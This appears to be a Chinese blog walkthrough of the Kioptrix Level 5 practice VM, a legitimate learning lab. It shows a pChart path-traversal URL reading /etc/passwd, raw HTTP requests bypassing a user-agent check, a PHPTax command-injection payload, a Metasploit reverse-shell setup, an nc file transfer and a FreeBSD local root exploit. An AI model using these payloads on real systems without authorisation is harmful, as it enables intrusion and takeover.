1.前期准备
kioptrix level 5解决时需要,移除此靶机的网卡,新增网卡才能使用nmap扫除ip地址(以下是官网介绍)
(右击靶机->选择设置->按照上图操作即可)(对了记得靶机改为nat模式)
2.扫描发现
(1)nmap扫描(ip扫描)
nmap -sP 192.168.18.1/24ip:192.168.18.129
(2)端口扫描(端口扫描)
nmap -p 1-65535 -A 192.168.18.129开放端口:22、80、8080
(3)目录扫描(dirb扫描)
dirb http://192.168.18.129
(4)发现一个页面,访问看看
(5)发现页面没什么东西,查看源码,发现一个地址
(6)复制地址进行访问
http://192.168.18.128/pChart2.1.3/index.php
像是一个资源库,到处点了点发现里面没啥东西,
(7)根据之前源码的pChart2.1.3果断网页搜索
pChart相关知识:pChart 是一个用 PHP 编写的开源图表绘制库,主要用于生成各种统计图表和数据可视化。它可以帮助开发者在网页或应用程序中动态生成高质量的图表,支持多种图表类型,如折线图、柱状图、饼图、雷达图等。
发现exploit的数据库里直接有相关可利用的点(激动.jpg),点进去之后发现,可利用的地方有两处,一个是文件访问,一个是跨站脚本
(8)文件访问零帧起手
http://192.168.18.129/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
发现etc/passwd里的文件被访问出来了,以及操作系统名称(freebsd)也都出来了,再通过wappalyzer插件,发现其使用了apache版本为2.2.21
百度上搜索,此操作系统以及此版本apache的配置文件地址
通过之前文件访问的漏洞来访问配置文件
前面倒没什么东西,一直往下翻,发现了这个(很诡异嗷),搜索SetEnvIf发现
SetEnvIf是 Apache HTTP 服务器中的一个指令,用于根据客户端请求的特定条件(如请求头信息)设置环境变量。这些环境变量可以在后续的配置中被引用,用于控制服务器的行为。
SetEnvIf的主要作用是在 Web 服务器中动态地根据请求的特定属性(如请求头、IP 地址、URL 等)设置环境变量,从而实现对请求的分类和处理。它的功能包括但不限于以下几点:
SetEnvIf在此处起一个如果想要访问8080端口,限定useragent的作用,此时就该bp出场了
(9)BurpSuite抓包并不断修改,发送包的useragent
访问8080端口
GET / HTTP/1.1
Host: 192.168.18.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
发现这里有个链接来点一手(还是在burpsuite中进行抓包放包,并且修改useragent,后面都要进行此类操作)
GET /phptax/ HTTP/1.1
Host: 192.168.18.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.18.129:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
发现是一个奇奇怪怪的页面,但管它呢继续修改useragent,再放包
最后就会是这个页面,发现这个页面没啥东西,结合之前8080端口访问了之后出来的phptax这个名字,咱们再在浏览器上搜索一下(发现phptax是一个开源税务管理软件)
PHPTax 是一款基于 PHP 的开源税务管理软件,主要用于帮助个人和小型企业进行税务计算和生成税务表单
直接浏览器看有无相关信息
发现还真有一个,点击进去查看
直接看最后的利用,发现这貌似是一个命令执行的漏洞,先试着在靶机上创建一个文件看看(依旧得通过bp抓包放包来修改useragent)
echo "123">/tmp/test12138.txtGET /phptax/index.php?pfilez=1040d1-pg2.tob;echo%20%22123%22%3E/tmp/test12138.txt;&pdf=make HTTP/1.1
Host: 192.168.18.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
再利用之前的发现的文件读取的漏洞来查看其是否写入
写入成功,自此边有了三条思路,可以采用一句话木马,通过echo写入服务器,通过蚁剑或者冰蝎进行访问,或者直接使用命令来建立反弹链接(这两种方法在别的大佬的文章里都有写过可以多看看,我这块是没有搞成功的(捂脸)),因此我采用另一种方法
3.渗透攻击
(1)使用msfconsole搜索phptax的exploit,并进行利用
发现了一个,那就决定是它了(但是吧这个方法有赌的成分在里面),进行利用(其中useragent以及payload都要设置,以及rport的端口要改为8080否则没法进入后台)
search phptax
set payload payload/cmd/unix/reverse
set LHOST 192.168.18.128
set LPORT 4444
set RPORT 8080
set RHOSTS 192.168.18.129
set useragent Mozilla/4.0 Mozilla4_browser
exploit
进入后台之后,传统的老三部曲(这个可以看后渗透相关讲解),在此我直接用方法
(2)查看操作系统版本
uname -a
(3)searchsploit查找可利用工具
searchsploit freebsd 9.0
这里是发现了两个,这两个工具进过我的测试都可以拿到root权限,这里就拿第一个来演示
(4)具体演示
①传输文件
但是吧这里进过测试发现wget以及upload都不行,最后发现nc命令可以来传输文件
kali端
nc -lvvp 4455 < 28718.c靶机端(靶机端此处的ip是kali机器的ip)
nc -nv 192.168.18.128 4455 > 28718.c
(注:一定要遵守先kali后靶机的顺序,链接建立成功之后在kali端单方面断掉链接即可传输成功)
②c文件编译,以及赋权
gcc 28718.c -o 28718chmod 777 28718③编译好的文件,执行获得root权限
4.root目录下查看flag
cd /root
cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.Be good...
loneferret
http://www.kioptrix.com
p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)
靶机攻克成功
(ps:本人新手新手一个刚打靶场没多久,如果有什么不对的地方请各位大佬指正)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
